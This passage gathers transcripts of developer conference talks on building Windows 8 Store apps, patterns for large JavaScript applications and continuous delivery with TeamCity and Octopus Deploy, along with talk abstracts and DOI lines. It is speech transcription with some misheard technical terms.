are shown in the right mode. So, that's what we'll immediately look into. First thing I still need to tell you is how does my application know when it's snapped? And that's really very easy because it doesn't require any codes on your behalf. You just need to make sure that the base page you're inheriting from. So, this is my view, probably group page, is a layout aware page. When you make new Windows Store application, that class is included. So, that layout aware page, that's a base class, and that will take care of triggering the visual state manager. So, no code for that. So, the only thing that's left is showing you how I can enable or disable certain parts of my user interface when we go to another mode. What I'm going to look into is called the snapped state. So, let's have a look at what happens here. Well, apparently in this visual state, the storyboard is defined. And that storyboard will change the back button, button on top left, the back button style to a snap back button style. We'll change the page title to a snapped page header text style. These are actually just the same buttons but a bit smaller, same text but a bit smaller. And it is going to look for an item list view and set its visibility to visible. And it's going to look for the item grid view and set that one's visibility to collapsed. So, this is actually all that happens. I define a few storyboards. I define a storyboard containing a few animations. And these animations will take certain parts of my user interface and make them visible or invisible, change their styles or do other things with them. This, of course, means that my item grid view, which is, well, this one, the one that shows all the horizontal stuff, is effectively replaced by a list view named item list view. And that's this one. What is this list view? That's the one you see on the left when I snap. And the nice thing here is that it is bound to exactly the same data. So, as far as code behind or code in your view model is concerned, that typically doesn't require extra code. It's exactly, it's typically bound to the exact same items as your grid view is bound, except that it's showing your data vertically instead of horizontally. Sometimes a bit less data as well. But supporting snap mode is more a matter of changing some similar round in your view than changing code behind or C sharp code. So, that's all that happens, actually. My list view is made visible. My item grid view is made collapsed. You might wonder, by the way, doesn't this have an impact on performance, et cetera? Well, if a control is collapsed in XAML, it's effectively not rendered. So, there's no code executed for it or whatever. Do watch out because if you just put the opacity to zero, which also makes it invisible, then all the events will fire and then it is rendered. So, just use collapsed and it will definitely not have any, it should not have any performance impact anymore. Okay. So, I told you I was going to skip a few slides and just tell it into code, tell it in code, which is exactly what I did. But I do want to say a few things about navigation. There's two modes of navigation I already talked about a bit. Let's look at that in a bit more detail. There's hierarchical navigation. It's very common, also on web pages. Typically, you would have a hub page, the main entry page of your app. You click on that one, we call that a section page, and you click one deeper, one level deeper, and you call that a detailed page. Why do I want to show you this? Simply to be able to say that, again, these are guidelines, but it is a good idea not to hide pages deeper in your hierarchy than four levels. I don't know the studies anymore, but there's been a bunch of studies on that and the odds of you effectively using that page or finding that page, if it's very deeper than four levels, are probably not worth the development costs of it. That's really important to know. Then, of course, there's the flat navigation, which is effectively done by the navigation bar on top. You just tap on and you go to another part of your app. Obviously, both are used in most applications. Maybe I should show you how this is done. Let's have a look at that. There's not a lot of code to that either. I have a feeling I'm kind of repeating myself that there's not a lot of code to that, but that's because introduction really is quite easy to get started with something like this. Let's have a look at the navigation bar on top. First, how do I define that one? Every view has a page.topAppBar property. You can simply set that to one of your own controls. In my case, I am setting that to something named the navigation bar. Why do I do this? Well, because I can easily reuse this navigation bar control on each page. The navigation bar, I have to look that one up. It should be here. There we go, our navigation bar. What is this? It's a type app bar, maybe a bit important. It simply contains my one button, which you've already seen, the big home button. When I click that one, I simply use the application's rootframe to navigate to another page. This is a bit different from what you might be used to, because instead of accepting a string, the navigate method effectively accepts a type. You use type of products group page, which is my view. Yes, you can pass in parameters if you want. Just the next parameter in this method will allow you to pass in data to another view. That's effectively how you navigate. There's not a lot more to it. In the page you navigate to, you will have unnavigated to and unnavigating from methods, which is where you end up in once a user goes to that page. You can catch that event or subscribe to that event to do whatever you need to do when a user navigates to a certain page. So this was a navigation bar, but that's kind of like related to the command bar. As I've said, command should typically go into the command bar. Now, how do you get a command bar? Where do you put that one? Well, let's have a look. If you remember, maybe I should start it up again. If you remember, I had a dummy command bar button on one of the detailed pages. Here, this pin button. Somehow this page has a command bar. Let's have a look at how this works. That's the details page. Let's make it a bigger. As you could have guessed, I guess, you don't only have a top-abar property on your page, you also have a bottom-abar property on your page. In this case, I define the application bar on the page itself because, well, command bars typically differ from page to page. You can also reuse another one of your own controls. Typically, the commands are page sensitive, so create it like this. You can, of course, depending on whether or not the user has selected something on that page, you can see these are simple example controls. You can reference them. You can hide them. You can show them depending on when the user clicks something or selects something. The main thing here was command bar goes in the bottom-abar property. Now we come to the most interesting part. This is the searching and the contracts and the sharing. I definitely wanted to get that in this session because it's something that really makes Windows Store applications stand apart from other systems I have seen. That is effectively using the Windows system as a go between your app and other applications. Let's start with searching. As I said, you can make your application searchable from anywhere in Windows, even from inside other applications, or at least that's how it looks. That means that we somehow need to be able to tell Windows that my application is searchable. That's the first thing. How do I do that? Well, back to that application manifest file I just showed you. There's a declaration step here. In that declaration step, you can say what your application supports or what it should support. As you can see, lots of stuff to do, lots of stuff your application can do. In our case, it's of course the searching that's important. I simply added a search declaration. You don't effectively have to fill in any of these things unless you want to override the defaults. I'm just simply using the defaults. This is literally everything you need to do to ensure that your application will end up in the list of searchable applications. End up in this list. Now, okay, easy enough. How do you really search now? I mean, I've just told Windows I can search. I can be searched, but I haven't written any code yet for effectively searching. Well, the main entry point of our application, the app.xaml, contains a bunch of methods you can override. One of the methods you can override, that's the one that will be executed, and that's the way your application will be started when a user starts searching from anywhere in Windows. So let's look at that one. That's in the app.xaml. Let me find it. Let's do it like this. There we go. So what I've done here, let's make it a bit bigger. I state when my window is created, so this is when the application starts up. The application window is created. I look for the search pane. Search pane.getforcurrentview. You can get that from anywhere, by the way. And I state, well, handle the query submitted event. And when a query is submitted, execute the onqueriesubmitted method, which is this one. So once a user starts searching your application, when your application is already active, this is, by the way, once a user starts searching in your application and your application is active, this is where you'll end up in the onqueriesubmitted method, which contains a bunch of arguments. And the important argument here, let's see, oops, probably better stop. That's the query text argument. So this query text argument, that is what contains search term your user pushed in in the search pane. And after that, I just, I have everything in my application that I need to get from the window system. I know the user wanted to search and I know what he wanted to search for. All the rest is just your own code or my own code. In this case, I simply navigate to the search results page and I'm sending a message. It's using an MVVM light, by the way. I'm just sending a message that it needs to search, which will in turn go to my service layer, search and return me the results. The important part here is that you end up in the onqueriesubmitted method and you get through your arguments the text you wanted to search for. Now, I specifically said this is where you end up in when your application is active, when your application is running. There's another way to end up in an application when user starts searching. And that is if your application isn't running. That can happen as well. I'm in another application and I want to search a banking product and I use my application to search for it. Well, then of course, I haven't gone through the onwindow created method and I don't have an event handler here because my application isn't running. My application hasn't even started yet, maybe. Where do I end up in then? I end up in the onsearch activated method. Windows will start my application and will execute the onsearch activated method, after which I can continue just as I did before. What I have to do here is all the code I use to normally start my application up, I create a frame, I go to the correct view. And after that, again, I send a message to refresh my search which contains the query text user typed in. That's probably the most important part here. Your user can activate your application which isn't even running yet through the search pane and then you'll end up here. So you have to handle that differently than when the application is already active. Right, that's one way. So that's one way of a search contract in which you say to Windows, I can be searched. So you might remember there's another way and that's the exact other way around being the sharing. So my application is active and I'm sending some data to another application to handle. That works a bit differently. In this case, I do not have to say to Windows that I can handle data from another application. So I don't need to add that in my manifest file. I just need to write a bit of code that will send the data from my application to whatever application that can handle it. So in fact, I'm sending it to Windows. And there's one pretty nice slide on this that shows you how this works. So the first thing I do, source application, that's me, I need to register with the data transfer manager. Again, this is an object you can access from anywhere in your Windows Store application, just like the search pane. I register with the data transfer manager and at a certain point, the user selects to share charm. So what happens then is me, as the active application, gets an event. An event is triggered. And that event is triggered. I go to the event handler and in that event handler, I have to create the package of data that will be shared. In my case, the banking product, some explanation about product and an image if I'm correct. So I have to create a data package. Data packages can have multiple formats, can be URIs, bitmaps, combinations, texts, even your own types if you only wish to share between your own company's applications. So I'm actually going to receive this event. I'm going to fill the data package. And after that, my call is completed and I'm actually done as far as my application is concerned. To share broker, which is a part of Windows, takes over. And the share broker is going to look for applications that can handle it. The user then selects something and automatically that application is activated. And the code in that other application is executed, which will handle the sharing of my package of data. So as you can see here, as far as our app is concerned, the only thing that needs to happen is that on the left. If you're a shared target, it's more or less the same as it was with searching. So you have events, you can override, methods, you can override in your app.xaml.cs. Okay, so that's the other way around. Let's see how that works. Let's go to the details page. That's where I put it. That's where I've shown it to you. So first thing we needed to do, and that's this here, I do this when I navigate to my page. I need to get the current data transfer manager, which is just the same as the search page. So get for current view, you'll get the current live data manager in your application. And I handle the data requested event. So I say, well, once a user clicks share, this is the event that will be executed. And share data requested is the method I will use to handle it. Let's go to that one. There we go. And the important thing here is filling that data package. What is that data package? Well, that's actually just the event arguments that contain a request property, which contains a data property. And in this data property, you fill in all the things you want to share. In my case, I give it title, a description, and I pass in an image. And after that, this method is done. And Windows takes over again. And this data package I have just created is sent to the other application. I do not get notified of this anymore, by the way. So there's no way to handle a share, okay, or whatever. Because it's now the responsibility of the other application, not my application anymore. Okay. So that's sharing. And there's one more thing I'd like to show you, and that's live tiles. As you can see on the start screen, these are all just make your application quite vivid, the tiles on my start screen here. It's always nice to have your application have one as well. This is the one from my application, Woodgrove Banking. And it doesn't just show the logo from the application. It actually shows me the gold credit card I've been using all along. So how do we create a live tile? Well, that's where the notification extensions come into play. To create a live tile, what you actually have to do is create a bunch of XML and use a tile update manager to send that to your Windows system, which will then show it as a live tile. To help us with that, so to ensure we do not have to create all the XML ourselves, I use notification extensions, which is actually just a wrapper around all that XML. So we now have nice class we can work with. So let's see how we do that. Let's go to the right one. I think I put it here. Yeah, create random tile method. So what do I do? I get the first one of my products I just fetched from my service. That's what I do here. And then I use the classes from my notification extensions to create a tile.
|
As you might have read somewhere, Windows 8 = Windows, re-imagined. Building applications for Windows 8 comes with a staggering amount of new possibilities, and in this session you'll learn all about it. We'll check out what you need to know to start developing Windows 8 apps using XAML & C#, and dive into snapping, contracts, charms, app bars, live tiles, and more. After this session, you'll leave with a newfound understanding of what can be achieved with Windows 8 development, and you'll be ready to start building your own killer app for Windows 8.
|
10.5446/51462 (DOI)
|
Yes, should we get started? So today we're going to talk a little bit about patterns of large scale JavaScript applications. There's been a lot of cool stuff going on these last few years. So I want to talk a little bit about some of the things that I've experienced and learned. Hello, my name is Kim. I work at Beck Consulting here in Oslo. And you can find more about me here. So we're going to talk about large JavaScript applications. But people tend to think that I'm talking about really large JavaScript applications when I say this. 20,000 lines of code or more. And it doesn't really have to be that way. All of these things that I'm talking about also the same concept apply for smaller applications. They can be a thousand lines of code. They can be a couple of thousand lines of code. And a lot of the patterns are still important to think about. So the main thing usually is that these are applications that need to live for a long time. And also applications that have unforeseen requirements. So most of this will apply to all of the JavaScript apps we write, at least for work. So the problem with JavaScript is that we tend to start out with something like this. It's a small feature. We send all the HTML from the server to the browser. And then we start creating a couple of small features. Five lines, 10 lines, 20 lines of code. And as the time goes by, we need more and more functionality. And then we suddenly have 5,000 lines of code in one file. And this happens all the time. I've been on several projects where this happened and it happens to everyone. I think this is a good term for it, jQuery soup. We get this brittle, tangled mess. And it's really hard to understand and hard to code in those apps. And maybe the worst thing is that it's hard to reason about the code. So that makes it difficult to create new features. So if you go back a couple of years to around 2006, we had an obtrusive JavaScript. We sent HTML to the browser and we used JavaScript to obtrusively add functionality. So it worked without JavaScript and we added functionality with JavaScript. And this year we also got jQuery. So the browsers back then was IE6. IE7 came out in 2006. We had Firefox 2. And the state of the web was different back then. So JavaScript was an amazing library. We really needed jQuery. The thing is that it's an amazing library for DOM manipulation. But we tend to follow a lot of anti-patterns when our apps grow. So we have things like coupling ourselves too much to the DOM. So when you change the HTML, you actually end up breaking your JavaScript. You put everything inside document ready. So whenever the code loads, it starts the entire thing and you have no way of testing it. And it's also hard to reuse. And also everything tends to end up in a jQuery plugin. And also all the things that don't have anything to do with jQuery. And maybe the worst thing is that too often the business logic is just hidden inside this brittle, tangled mess of a code base. So if we just look at a reasonably simple example, we have a form here. And when you submit the form, we do an IEX request. And on success on that request, we actually receive some... We get the data and we put it into the DOM. But the thing is that right here there's a lot of stuff going on. We have page events and user events and network IEO. We have network events. We do templating, parsing of the response and a lot of stuff. And we also get callback L. We got these structures that just go in and in and in. So there's callbacks inside, callbacks inside, callbacks. And what happens then when we have this considerable increase in the amount of JavaScript? We have a lot of more interactive pages than before. And there's a lot of complexity just in the user interfaces. We could have something like the new Google Maps. So here we require JavaScript for anything to function at all. So we've come a long way. And what has happened is that we're pushing more and more stuff from the back end to the front end. So a lot of the stuff that we before did on the back end, we now do dynamically with JavaScript on the front end. And also we've got a lot of new capabilities in the browsers. There's still a browser war. There's still really pushing for new stuff into the browser. So you have geolocation, local storage, canvas, and a lot of other stuff. So this means that there's more and more complexity in your front end application. So the problem is no longer the browser itself and the capabilities you have there. It's the size and complexity of our applications. I saw a great talk about a year ago from Brandon Keepers who works at GitHub. He said that the litmus test for your application is that if your site breaks, when your JavaScript fails, you should treat it like a real language. And this is mainly what we're going to focus on, what it means to treat JavaScript as a real language. Because what we want is testable, scalable, and maintainable JavaScript. This is where we want to be. The problem, though, is that this is really difficult. It takes a lot of time to learn. I've been doing this full time for a couple of years, and we've had a really hard time to get there. We're starting to get there. So the problem is that we need to unlearn a lot of stuff, because we've coded JavaScript for 10 years, a lot of us, and we're used to doing it the jQuery way. And it's so easy to create brittle systems when we're using jQuery. But the first thing is that we need to unlearn our DOM-centric approach to creating websites. So the problem with the DOM is that it's this big blob of state. So you have this stateful and global object you're working with all the time. So this makes it really hard to maintain your codebase when your application grows, because you're working on this one blob of state. And it's also really hard to test. And debugging some of these applications can also be really hard, because there's usually a lot of stuff going on, and it depends on the state you're currently in. We also need to unlearn how we write JavaScript. We need to learn from how they do it on the back end, and we need to get away from 5,000 lines of code in a single file. We also need to watch out for globals, not just the DOM itself, but also globals in general. So basically, learn more from the back end. And we need to unlearn how we use jQuery. This is a great quote from growing object-oriented software guided by tests, which is an amazing book. They say that when your code is difficult to test, it's most likely because you need to improve your design. Justin Meyer, who created a JavaScript MVC library, said this, is that to build large applications, you need to never build large applications. You need to build small pieces and assemble those into your application. So we need to get away from these big files. And these last couple of years, we've started to get some help here. We've got a lot of new libraries, so we have things like knockouts and backbone, which are reasonably small. We also have things like Ember and AngularJS, which is more full-fledged frameworks. So they're trying to help solve the problem, and they have quite different philosophies, so we're going to try to understand some of the things that they do. Because right now, it's easy to feel overwhelmed by choice. It's a daunting task just to be able to choose one of them. I would have struggled with that if I was starting a new project right now. So the thing is that we need a foundation to discuss the features they have and how they do things, and also to understand the value they add and how you can solve it yourself without using a library or framework at all. So the most important thing is to get the state away from the DOM. This is the same for all of those libraries. They all want you to get the state away from the DOM. And one way of doing this is NBC. This is what most of those libraries are inspired by. So if we just look at these last few years, we have from 2005 here, and this is a Google search for JavaScript NBC, or the Google Trends. And we see that this is really growing. So the main thing here about NBC, I guess a lot of you are back-end developers, so you know what NBC is. But the main point here is that you want this clean separation between your data and the DOM. So the controller here is the thing that mediates input and manipulates the model. However, you won't see that cleanly applied in a lot of front-end JavaScript frameworks and libraries. There's a lot of variation there, so you often see this instead, ModelViewStar. And this is just because a lot of them has a different take on what that last part is. So the thing is you want to split your data and the DOM, and how you do it, I think you can call it that, is quite different from library to library. So you can have something like a ModelView presenter where all the presentation logic is pushed into the presenter. So now the view doesn't know about the model at all. It's the presenter that gives the view the data. You can have something like ModelViewViewModel, where the view model is the one that exposes data to the view. So this is a quote from one of the core developers in AngularJS. He says that AngularJS is a ModelViewWhatever framework, where whatever stands for whatever works for you. They started out being mostly MVC and has gradually become more NVVM. But the thing is they also say this very clearly that it is ModelViewWhatever. So the most important thing here is separating the state and the DOM. So this is the first step. We've already gotten somewhere. So just by thinking about this, it should be easier to work with JavaScript. MVStar is not enough, though. Just having this pattern to follow still doesn't say a lot about how your code should look like and how it should work. And a lot of things that you need to think about. For example, here, Joel Hooks wrote a great blog post about a month ago, where he talked about his experiences with AngularJS. And what he says is that when he started on this project, there was a lot of monolithic single files that contained too much code. So just following MVStar itself is not enough. So he talked a lot about the importance of code organization and how important that was for actually getting an application that was easy to work with and where you can add features rapidly. And this is also a great quote by Jim Levin, who says that, just how you split your code has an impact on the maintainability of the application. So really what we want to do is have far more files and far less in the file size. So we want to get away from these 5,000 lines of code in a single file. It's better to have more files that are smaller, easier to work with. So you want more focused files. There's not enough just to split up. You need to think about how you do it. So there's two ways, for example, there are two ways we can think about this. We could package our code by feature or we could package it by layer. So if we look at this, is it large enough? So for example, if you package your code by feature, you could have a module like this, a module folder like this, where you have, you can see the high level scope of the application. So here we're working with BankID, we have some customer information and some other stuff. Or you could have package it by layer, so you have a modules, models folder, a collections folder, a views folder, a routers folder. So this is from a backbone project. So I prefer packaging by feature and I usually tend to call them modules. That was also the module name on the folder they were in. So a module is something like this. So here we see just the search bar on Facebook. That can be a module. So it's a bite-sized piece of your application. It could also be something like this, where we input the status. So it's still a small feature on Facebook itself. Or it could be something like this on the right side. So modules are the things that contain business logic. So this is mainly where you want to have all your business logic and all of the stuff that is special about your application. All the other stuff is usually mostly set up and reusable functions. So the modules should be small. They should try to solve one problem and should really try to relentlessly split into modules. Of course you shouldn't go for like 10 lines and everything, but you should really focus on what feature are we working on here. And try to separate them from the rest of the site. So this should be focused and they should really do one thing really well. I also think that modules should be decoupled from other modules. So you don't need absolute separation, but they really should be separated from each other. So you can place it in a new context. You can move it around on the site and it doesn't break anything. That's not easy in a lot of jQuery apps. If you move it around, you change the DOM structure so your application breaks. At least it's more difficult to do this in a jQuery application. And also it should, just doing this should make your app easier to reason about. It's easier to understand what's happening where. And I think that they should preferably be reusable. This is of course not a requirement, but it's a good thing to have in mind because it puts you in another mindset. So you start thinking about the things you're creating. So I tend to think a lot about this when I work with what I call modules. And I also think that they should be easily testable and they will be more easily testable just by creating these smaller, more focused modules instead of having your big application. So just by following the steps themselves, it should be easier to test your modules and your application in general. So there's still a lot of things we need to think about to get testable JavaScript because testable JavaScript is really hard. There's a lot of books written about it recently. There's a lot of presentations about it. There's a lot of people talking about it, but still it's quite hard to get there. We've been working quite hard with it for a couple of years and we're still struggling with really testing our JavaScript in a good way. And one of the core problems here is that we need to work with a DOM that is actually stateful and that is the big blob. So testing JavaScript is hard. Again, from growing object oriented software, they say that your system is easier to change if its objects are context independent. So that's precisely what we want to do with our modules. So the object shouldn't have any built-in knowledge about the system in which it executes. So now moving them around is far easier. If they don't depend on the DOM in the same way, it's easier to reuse them in another context. So you can move that search bar to a new page. It's now easier. So we can set down some ground rules for our modules. So just a couple of minor rules. And the first one is that they should never access the DOM outside the module. As soon as you do this, it's far easier to reason about your code because this module works on this part of the site. It doesn't suddenly work on a totally other place on the site. So this might seem like a natural thing to do, but it's so easy to start working on other places on the site. They also shouldn't create global variables. As soon as it creates global variables, someone else could work on those global variables and could put your system in the wrong state. So generally, try to keep away from global variables as much as possible. This is perhaps one of the most important things to think about when working with larger applications. Because the global variables are really hard to track what state they're in. And also don't access global variables, except, of course, the native built-in ones in JavaScript. So keeping these things in mind should really get you a long way. There's just a couple of simple steps, a couple of simple things to think about. So you have mvstar, just split, separate the DOM from your state or your data. And then you have modules. It's just a way to think about how you separate those things. So you create these small, bite-sized pieces of your application instead of having these large JavaScript files. So next up then is how we handle dependencies. This is also quite hard in JavaScript. We have a lot of different types of dependencies. We might depend on other code. So that's when the application runs. We actually need to have access to some objects. We need to have access to a place in the DOM where we should place our module. And there's a lot of dependencies you have in your code. You also tend to depend on other files. As soon as we start thinking about modules, you usually need to depend on something else. So you need to get that into your application in some way. And we also depend on third-party libraries. So things like jQuery, Backbone, Angular, and those things. So if we're just going to look at one of them at a time, so the first one is that we depend on other code. And the problem here is that we tend to depend far too much on global stuff because JavaScript makes this really easy. So here's an example of that. We have this small bit of jQuery. We find an element in the DOM. We click that element. We wait for a click on that element. And then we do an IAX request. And on success, we update the DOM. So just a minor piece of code. The problem here is that we have a bit of code that can't be reused. We have this anonymous function that is called directly. So this is really hard to reuse in another context. What if you need to fetch the same data? It's also difficult to test because you need to actually have the DOM available and you need to bind this click event and then click on the button. And that's really difficult. You don't need that at all. You shouldn't need that at all. And you also have a couple of globals. So here we're using jQuery. So jQuery.get. We do an IAX request. And we also update the DOM directly here. So by doing some changes here, we can really make this far better. So the first step could just be to name that function and take it out of the click handler. So now we have a method here that we can call directly. So now you don't have to create the DOM with the click handler, the click event. So now you can call the function directly, but you still have a couple of problems. You have this IAX request that is difficult to test. So now when you call this bit of code, it will do an IAX request. So you need to either muck out jQuery or you need to muck out all IAX requests. You shouldn't need to do that. You also still have the globals. You rely on having jQuery available in the global namespace. And you also depend on having the DOM. So we kind of got away from the DOM problem, but we also still have a DOM problem. So here we're just changing it up a little bit. Instead of relying on jQuery being available in the global namespace, we send it into the function. So we could have called in something else here, like just jQuery, when we sent it in. But here I called it IAX, so we can see IAX.get. So now if we want to test this, this is far easier. Now we can muck this out. We can send in something that has a get method that does just what we want to do. We have also sent in the HTML element where results should live. So now we can create an empty element with jQuery and send that in, for example. So you don't need to set up the entire DOM anymore. So now this is far easier to test, and this is actually far easier to reuse in other contexts. If you need to do the same IAX request and update another place in the DOM, that is really easy now. So the thing is that now we can control the dependencies. So we're still at a reasonably low level of abstraction here. So we could have had higher level abstractions for IAX and everything. We're still just working with jQuery itself. It's just that we're using jQuery a little bit differently than we usually do. So I wrote a blog post about this. I think it's about a year ago where I talked a little bit about a view abstraction based on backbone. So just using pure JavaScript instead of relying on backbone, which even though it's small, it's a thousand lines of code. So you could create, say that you have a view with just some subsection of your site, for example, the search bar that we saw on Facebook. So you could have a user view where you say that you want to receive, do I have the mouse here? Maybe? So you say here that you want to have an HTML element that you receive, and you also want to receive a user. So with user view now, we can, this is on the bottom here, we can say that we want to create an instance of this. So with JavaScript you can create an instance of your function, and then this will be for that instance. So we put the HTML element that we send in, which is here something we found in the DOM, and we also send in user and put that on the instance. So now we can create methods on this view. So we can create a showImageInstant method that just appends an image to the DOM. And now we can call that method. So the thing is now that we have another way to think about how we use jQuery. Now we send it in, now we have wrapped it in a reasonably simple abstraction. So this is no library at all, this is just a way to use pure JavaScript. And this is basically what, for example, Backbone. It's just a couple of helpers in addition to this. So what I would say is always inject your dependencies. This really helps with structure, it helps with testing, and it helps with creating larger applications. And an example of someone who has really embraced this is AngularJS. Here's an example of some AngularJS code. You have a controller, which is the thing that puts stuff, for example, on or makes stuff available for your DOM, for your HTML. So the thing that you put on scope here, which is something you get into your controller, will be available for your template. So here you can see that. So let's see if we have the mouse here. What you put on scope here will be available. So now we can do an IX request. And then on success, we update the scope, which then makes it available for the template. The thing is that it doesn't matter which way you order your arguments here. If you just change that around, Angular will still handle this with no problem. So they have a built-in service locator. So they see the function, they can see the name of the parameters, and then they go looking for that. So here it's built in functionality in AngularJS, the HTTP and the scope. But you can also register your own bits of code here. So to take an example from AngularJS, you could do something like this. You say that you want to create a module. Here it's named NDC, and it has no dependencies. That's the empty array. Then you can say that you want to create a function, which is named awesome. And that function should return awesome conference. And then you can create an injector. And in your injector, you say that you depend on NDC, which is your module, and you also depend on NG, which is a built-in Angular module. So this happens behind the scenes in AngularJS itself, but it's quite easy to do with the built-in stuff. So here we see that the NDC is just the NDC module. And now we can invoke a function on that injector. So here we see that we have a function, which takes in awesome, and then it console logs. So this will actually console log awesome conference. So Angular finds the name here, and it finds it in the things you have registered on the NDC module. Another cool thing that is going on in a lot of new libraries and frameworks is two-way binding. So this is a really cool way to work with the DOM. It's done in, amongst others, knockout, Angular, and Ember. So if you look at an example from EmberJS, we have a template at the top here, where it says if it's expanded, then it should show some data. And it should also show a button where you can press on to contract the input. And then if it is expanded, it should show a button where it says show more. So if you look at the post controller, which is the thing that gives the data, give the template its data, you can see that it's expanded defaults to being false. So the first time you render this template, it will go to showing the button that says show more. And on the show more button, you have this action where it say expand. So when you click on expand, click on this button, it calls the expand action, which is on the post controller. So here we see that we update is expanded to true. So now it will automatically update the template. So the thing is here, we have no jQuery at all, but we're still working with the DOM. So this is just another way to work with the DOM that is really, it's used quite a bit in the three libraries I mentioned. So you get rid of event handlers, you get rid of manual DOM updates, and you can ensure that your template is in sync with your data without having all of this jQuery hacking. So that was the first thing. Now we have another way to work on, work with other code. So now if we go on to look on other files, the problem now is that we depend on the order of script elements in our index HTML. And when you get hundreds of files, this is really a problem. It becomes unmaintainable, and it also becomes really brittle. And it's hard to know what needs to be there for something to function, especially when you get, say that you have 100 files, this is really hard. So we want to get away from this. We need something better. Because the thing is that we introduced lots of globals here. So we pull in jQuery, then we have jQuery as a global. We pull in Backbone, then we have Backbone on the global namespace. We have our own code that is on the global namespace. So you have a lot of weakly stated dependencies. It's hard to see what needs to be there for something else to function. So we need a better way to refer to other files. Two ways of doing this is commonJS and AMD. CommonJS is the way that Node.js solves this. It looks something like this. We say that we require jQuery, and we take the results from that require, and we put it on the dollar. And then we can also say that we export something from our current file. So here we export my function, so that when other require our file, that file, it has my function available. AMD is another way of doing this. Here you see that when you define this bit of functionality, you depend on jQuery. And it's also put in here into the dollar. And what you return from this function will be available when someone else say that they depend on this file. So now we can avoid globals. Now we can get away from having jQuery on the global namespace. And we don't need to use backbone from the global namespace. So now it's really easy to see dependencies. When you open a file, you can see it at the top of the file, what this bit of code depend on. And that makes your code, I would say, easier to understand. You can see right then and there what you depend on. And you can also see that you depend on too much stuff. When you have 50 things you depend on, that's usually a sign that you need to do something. So this is also a way to help you. And I'll split your code into new modules to split that file into something less than the 5,000 lines of code. Right now AMD works better in current browsers. You have some ways of running common JS, such as a library called Browserify. But right now AMD works a little bit better because it's asynchronous. So what happens here is that usually when you say that you depend on jQuery, the library can see have you loaded jQuery already? No, you haven't. Okay, then I go dynamically look for jQuery on the server. And you can also minify that into one file for production. For example, with something like RequireJS, there's a lot of implementations of AMD right now. I've used RequireJS quite a bit. And it works quite good. Of course there's a bit of complexity when you pull in something like this because this is a central part of your site, how you handle modules. So RequireJS has worked quite good for me. It also has a minifier. So you can have 200 files in development and you only want one file in production. There's a minifier there that you can run to get this one file. So now we have handled how we depend on other files. So now we can see that there isn't really a problem depending on 200 other files when you have something that can solve it for you. There's also stuff going on here for a new versions of JavaScript. So there will be some built-in modules stuff coming in a new version of JavaScript. So the last thing for dependencies is that we depend on third-party libraries. And we need to keep this up to date. Now you usually need to go to jQuery.com, see that, okay, jQuery is updated, and then you need to download it and everything. And it's also really hard to see, is it updated, without going to all of these pages to see. So you can use a package manager like Component or Bower. This is still, I don't know, quite... This is new stuff. This is happening right now. Twitter created Bower or released Bower. It's not a long time ago. So this is quite new and it might not be the perfect solution yet. And there's a lot of difficult problems to solve here. But with Bower, for example, you can do something like this. You say that in your Bower.json file, you can say that you depend on AngularJS, you depend on AngularResource, and you can see that we depend here on version 107. We can also say that we depend on jQuery. And now, when you type Bower install, it will go looking for those on GitHub. And the nice thing now is that if you type BowerList, you can see that you have downloaded Angular, AngularResource, which depend on Angular, and you can also see that jQuery is not up to date. So there are new versions available. And then you have 20, 30, 40 dependencies. This makes your code really easy. It makes it far easier to update dependencies regularly. So, for example, here, if we have written BowerUpdate, we could update these dependencies. And to save a new dependency into our Bower.json file, we can say Bower install, dash dash save bootstrap, for example, to download Twitter Bootstrap. So this is somewhat similar to NPM for those that I've played with Node.js. So, we've been through quite a lot of stuff. There's a lot of new stuff going on in JavaScript right now, and there has been for a couple of years, and there will happen a lot of stuff the next couple of years. But your question might be, seriously, do you need to do all this stuff? And I think it depends on the type of application you're making. So usually, we have applications that need to live for a long time. You have a lot of unforeseen requirements. You need to adapt to what's going on. So there's this big push for having even more interactive stuff on the front end. So we have more and more complex applications. And when we have more and more complex applications, we really need to think about how we develop our applications. So I absolutely think it's necessary to start thinking about these things and learn more about them. And not all of them are ready for production use if you're not ready to debug it and stuff. I've been debugging Bower somewhat lately. It doesn't run that good on Windows. So I think we need it, but we're still not quite there yet. For some of the things we are, so you should absolutely go check out Angular and Ember and Knockout and Backbone at least. There's a lot of cool stuff going on. So if you want to learn more about this, me and a couple of friends created this resource for finding good articles and videos on this stuff because we thought it was really difficult to find good stuff on JavaScript. So if you have any good ideas for articles, videos, presentations, whatever, just send us an email because we really want to have a really good resource for people to find good stuff for creating large JavaScript applications. So that's all. I've put the presentation online so you can find it at Speaker Deck. So any questions? And if you don't have any questions right now, you can also find me afterwards. I will also be here on both tomorrow and on Friday, so you can just come by and talk about JavaScript. So if there are no questions, I think we're done. Thank you.
|
JavaScript has come a long way in few years. As we no longer need to battle DOM differences we can focus on building our applications instead. Now, however, as more and more application logic move from the server to the client our main problem is that we need to unlearn our earlier DOM-centric approach to JavaScript. Tools such as Backbone and Angular help, but before we are able to use the effectively we have to change some of our neural pathways. In this talk I will look at a couple of patterns that will help you move away from jQuery spaghetti and get you started on a foundation for building large-scale JavaScript applications.
|
10.5446/51465 (DOI)
|
Hello! Welcome everybody. This is my talk, Automated Release Management with TeamCity and Octopus Deploy. Thank you for coming. I have a lot of slides and a lot to say and something to show, so I'll just start right away. We start about, we have to start with a little bit of history to understand continuous delivery and why we should use it. It started with continuous integration some 10, 15 years ago where we realized that using the version control wasn't enough, so we started adding build servers and running and compiling the code on each check-in and running unit tests and that gave us many advantages and better software for a lot of us. Then they came a blog, talked about continuous deployment, which proposed to use the practices we used for continuous integration but also try to automate the deployment process. After a while, there came a book called Continuous Delivery which tried to take this even further and say that, okay, you are not finished writing your software until you are in release and you should automate everything. And really, it's all about failing fast. If you work for a long time, write a lot of code and then check it in and find a bug. You will have to backtrace a lot, especially if you have, say, implemented five features, you have a bug in the first feature and the next four features rely on the first. Then you have to do everything again. So if you do small incremental changes or small releases, you will have smaller steps to backtrace if something goes wrong. So it's essentially the same logic used for writing unit tests and continuous integration only applied to deploying and releasing. In the book, Continuous Delivery, the first chapter available online, you can find this graph, this chart. It's an image of the deployment pipeline. As you can see on the top, you have your source control which contains your source code and also your environment and app configs. At the bottom, you have the artifact repository which contains all the products of the builds and tests. So with the test reports, test coverage and actual deployment package. You have the commit stage where you compile the code, you run the commit tests. That's the ones that take short enough time to be in this stage. Then you assemble the package and you do some code analysis. If everything is okay, you will automatically deploy and go to the next stage, the acceptance stage. Where you configure and deploy this to your test environment, run a smoke test to see that the website is up and running and then you run your automated acceptance tests. If this goes well, then you will have one, usually one click deployment to the next environment. You have the user acceptance environment where you have some manual 